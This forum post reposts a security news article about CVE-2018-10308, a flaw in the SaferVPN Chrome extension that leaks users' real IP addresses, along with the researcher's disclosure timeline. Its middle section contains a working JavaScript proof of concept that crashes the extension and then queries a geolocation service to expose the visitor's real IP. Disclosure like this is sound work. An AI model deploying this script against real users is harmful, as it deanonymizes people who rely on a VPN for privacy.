Privacy News SaferVPN Chrome Extension CVE-2018-10308 Vulnerability, From DOS To Deanonymization!

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
SaferVPN Chrome Extension CVE-2018-10308 Vulnerability, From DOS To Deanonymization!
By Pierluigi Paganini on securityaffairs.co

Researchers Paulos Yibelo explored a vulnerability he found in SaferVPN Chrome Extension. The vulnerability tracked as CVE-2018-10308 should help malicious actors to retrieve vital information such as IP addresses when a user visits a website.

After my last month’s finding in Hotspot Shield, I decided to look at and audit more VPNs to see how many of the major VPN vendors are vulnerable to information leakage. Together with File Descriptor, we decided to look at 3 random major VPN clients to see what we can find. Our research was supported by the privacy advocate vpnmentor.

We initially selected PureVPN, Hotspot Shield, and Zenmate as pilot targets and went ahead with the research. what we’ve found surprised us: of all 3 VPN’s we’ve tested, we’ve discovered all of them leak sensitive data.

The vulnerabilities would have allowed governments, hostile organizations, or individuals to identify the actual IP address or DNS of a user, and in some cases hijack the user’s traffic. While Zenmate’s leak was somewhat minor compared to the two other VPNs, its still important. You can find the details of the vulnerabilities found here, here or here.

The fact that we found leaks in all the VPNs that we tested is worrying, and led us to believe VPNs may not be as safe as many may think. This opened doors for further research.Our guess is that most VPNs have similar leaks and that users should take this into consideration when using VPNs.

Details

In this blog post, I will explore a vulnerability I found in SaferVPN Chrome Extension. the vulnerability, CVE-2018-10308 as simple as it is, should help malicious actors retrieve vital information such as IP addresses when a user visits a website.

When a series of simultaneous requests to a nonexistent server is sent, the VPN extension easily crashes, letting us leak real user IPs, DNS and other details which the VPN is supposed to hide.

This is a weird bug, as I didn’t know chrome extensions could be dosed until now. I’ve tried putting breakpoints through the extension’s debugger to see what is causing it and they seem to intentionally kill the extension when it resolves many non existent dns queries.

Here is a PoC that works on versions before 3.1.10

<script type=”text/javascript”>
var head = document.getElementsByTagName(‘head’)[0];
var img = document.createElement(‘img’);
img.src= “https://nonexistant.nonexistant.nonexistant”;
function kill(){
for(var i=0;i<12;i++){
head.appendChild(img);
}
}
kill();
window.onload = setTimeout(function () {
var webService = “https://freegeoip.net/json/”;
var script = document.createElement(“script”);
script.type = “text/javascript”;
script.src = webService+”?callback=MyIP&format=jsonp”;
document.getElementsByTagName(“head”)[0].appendChild(script);
}, 9000);
function MyIP(response) {
document.getElementById(“ipaddress”).innerHTML = response.ip;
}
</script>
<div id = “ipaddress”></div>



Timeline

Thu, Mar 29 – contacted SaferVPN
Thu, Apr 19 – SaferVPN patch live.


About the author Paulos Yibelo


Original post @ VPN leaks affect 3 Major VPN vendors, only Hotspot Shield promptly fixed it


Pierluigi Paganini
...and look for the video on the SecurityAffairs website...
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top